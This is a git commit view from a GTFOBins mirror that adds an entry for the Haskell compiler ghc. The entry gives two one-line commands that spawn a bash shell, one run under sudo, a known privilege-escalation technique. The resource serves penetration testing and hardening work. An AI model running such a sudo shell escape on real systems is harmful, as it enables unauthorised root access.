1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 15:59:17 +01:00

Add ghc binary

This commit is contained in:
Ryan Saridar 2020-10-22 17:20:23 +01:00 committed by Andrea Cardaci
parent a49cccf7da
commit 106dede9da

7
_gtfobins/ghc.md Normal file

@ -0,0 +1,7 @@
---
functions:
shell:
- code: ghc -e 'System.Process.callCommand "/bin/bash"'
sudo:
- code: sudo ghc -e 'System.Process.callCommand "/bin/bash"'
---